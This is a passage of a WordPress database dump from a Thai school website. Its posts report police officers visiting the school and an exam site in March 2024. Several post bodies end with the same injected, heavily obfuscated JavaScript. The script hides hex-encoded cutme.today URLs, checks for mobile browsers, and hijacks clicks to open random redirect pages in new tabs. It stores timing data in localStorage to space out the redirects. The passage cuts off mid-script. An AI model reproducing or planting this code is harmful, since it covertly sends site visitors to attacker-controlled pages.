(401,1,'2024-08-01 20:38:07','2024-08-01 13:38:07','<!-- wp:paragraph -->\n<p><strong></strong><strong>เมื่อวันที่ 2 มีนาคม พ.ศ.2567</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong></strong><strong>เวลา 10.22 น.</strong><strong> </strong><strong>ร้อยตำรวจเอกพงษ์ศักดิ์ กุลบุตร</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>รอง สารวัตรป้องกันปราบปราม</strong><strong> </strong><strong>สภ.โนนคูณ ได้ออกตรวจเยี่ยม โรงเรียนบ้านหนองปลาเข็ง กอไหล่ และตรวจเยี่ยมสนามสอบ นักเรียน ศูนย์การศึกษานอกระบบ ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong></strong><strong>โดยมีท่าน</strong><strong>ผู้อำนวยการโรงเรียนเสน่หา</strong><strong> </strong><strong>พลโสภา </strong><strong>พร้อมด้วยคณะครู ได้ดูแล และอำนวยความสะดวกในการตรวจเยี่ยม ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":400,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/10-67-1-724x1024.png\" alt=\"\" class=\"wp-image-400\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','398-revision-v1','','','2024-08-01 20:38:07','2024-08-01 13:38:07','',398,'http://pakhaeng.ssk.in.th/?p=401',0,'revision','',0),
(402,1,'2024-08-01 20:39:01','2024-08-01 13:39:01','<!-- wp:paragraph -->\n<p><strong></strong><strong>เมื่อวันที่ 3 มีนาคม พ.ศ.2567</strong><strong> </strong><strong></strong><strong>เวลา 10.22 น. ร้อยตำรวจเอกธนวรรธน์ พูนทวีวรกิตติ</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>รองสารวัตรป้องกันปราบปราม</strong><strong> </strong><strong>สภ.โนนคูณ ได้ออกตรวจเยี่ยม โรงเรียนบ้านหนองปลาเข็ง กอไหล่ และตรวจเยี่ยมสนามสอบ ศูนย์การศึกษานอกระบบนักเรียน</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ระดับ ม.4-6</strong><strong> </strong><strong>ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong></strong><strong>โดยมีท่าน</strong><strong>ผู้อำนวยการโรงเรียนเสน่หา</strong><strong> </strong><strong>พลโสภา </strong><strong>พร้อมด้วยคณะครู ได้ดูแล และอำนวยความสะดวกในการตรวจเยี่ยม ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":403,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/11-67-724x1024.png\" alt=\"\" class=\"wp-image-403\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-23','','','2024-08-01 20:39:02','2024-08-01 13:39:02','',0,'http://pakhaeng.ssk.in.th/?p=402',0,'post','',0),
(403,1,'2024-08-01 20:38:50','2024-08-01 13:38:50','','11-67','','inherit','','closed','','11-67','','','2024-08-01 20:38:50','2024-08-01 13:38:50','',402,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/11-67.png',0,'attachment','image/png',0),
(404,1,'2024-08-01 20:39:01','2024-08-01 13:39:01','<!-- wp:paragraph -->\n<p><strong></strong><strong>เมื่อวันที่ 3 มีนาคม พ.ศ.2567</strong><strong> </strong><strong></strong><strong>เวลา 10.22 น. ร้อยตำรวจเอกธนวรรธน์ พูนทวีวรกิตติ</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>รองสารวัตรป้องกันปราบปราม</strong><strong> </strong><strong>สภ.โนนคูณ ได้ออกตรวจเยี่ยม โรงเรียนบ้านหนองปลาเข็ง กอไหล่ และตรวจเยี่ยมสนามสอบ ศูนย์การศึกษานอกระบบนักเรียน</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ระดับ ม.4-6</strong><strong> </strong><strong>ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong></strong><strong>โดยมีท่าน</strong><strong>ผู้อำนวยการโรงเรียนเสน่หา</strong><strong> </strong><strong>พลโสภา </strong><strong>พร้อมด้วยคณะครู ได้ดูแล และอำนวยความสะดวกในการตรวจเยี่ยม ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":403,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/11-67-724x1024.png\" alt=\"\" class=\"wp-image-403\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\